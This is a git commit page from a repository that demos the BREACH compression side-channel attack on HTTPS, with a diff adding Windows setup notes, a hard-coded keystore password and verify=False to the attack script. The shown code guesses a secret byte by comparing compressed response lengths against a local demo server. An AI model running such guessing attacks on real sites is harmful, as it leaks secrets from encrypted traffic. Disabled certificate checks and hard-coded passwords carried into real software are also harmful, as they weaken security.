breach-https

old python script to demo breach-https vulnerbility

git clone https://9o.is/git/breach-https.git

commit 2728be826719d48a9c743ca049f964a7fe7ead39
parent b4a8539e5118c93beea458921b73041e0f83e40c
Author: Jul <jul@9o.is>
Date:   Thu, 24 Oct 2013 09:52:10 -0400

edit for windows

Diffstat:

MREADME.md | 11++++++++++-


Mbreach.py | 8++++----


Mserver/sbt.bat | 4++--


3 files changed, 16 insertions(+), 7 deletions(-)

diff --git a/README.md b/README.md
@@ -17,12 +17,20 @@ then go to
 
     https://127.0.0.1:8433
 
-If you're on windows, run the batch file instead.
+If you're on windows, run the batch file instead:
+
+    sbt.bat run
 
 ### Step 2
 
 Execute the Python Breach script:
 
     python breach.py
+    
+Python module, Requests, is needed. You can install it with pip or easy_install:
 
+    pip install requests
+    
+or
 
+    easy_install requests
+\ No newline at end of file
diff --git a/breach.py b/breach.py
@@ -33,15 +33,15 @@ def IsCorrectGuess(currentCanary, guess):
       'Accept' : '*/*', \
       'User-Agent' : 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (BREACH 1.0, like Gecko) Chrome/22.0.1229.94 Safari/537.4', \
       'Connection' : 'keep-alive'}
-  r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers)
-  r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers)
+  r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers, verify=False)
+  r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers, verify=False)
   r1Len = len(r1.raw.data)
   r2Len = len(r2.raw.data)
   NumberOfRequests += 2
 
   if not r1.ok or not r2.ok or math.fabs(r1Len - r2Len) > 100:
-    r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers)
-    r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers) 
+    r1 = requests.get(targetURL + currentCanary + guess + padding + "@", headers=headers, verify=False)
+    r2 = requests.get(targetURL + currentCanary + padding + guess + "@", headers=headers, verify=False) 
     r1Len = len(r1.raw.data)
     r2Len = len(r2.raw.data)
     NumberOfRequests += 2
diff --git a/server/sbt.bat b/server/sbt.bat
@@ -1,2 +1,2 @@
 set SCRIPT_DIR=%~dp0
-java -Dfile.encoding=UTF8 -Xms512M -Xmx950M -Xss1M -XX:+CMSClassUnloadingEnabled -XX:MaxPermSize=384M -jar "%SCRIPT_DIR%sbt-launch.jar" %*
-\ No newline at end of file
+java -Djetty.ssl.keyStore=keystore -Djetty.ssl.keyStorePassword=6dUtGYj3k68x -Dfile.encoding=UTF8 -Xms512M -Xmx950M -Xss1M -XX:+CMSClassUnloadingEnabled -XX:MaxPermSize=384M -jar "%SCRIPT_DIR%sbt-launch.jar" %*
+\ No newline at end of file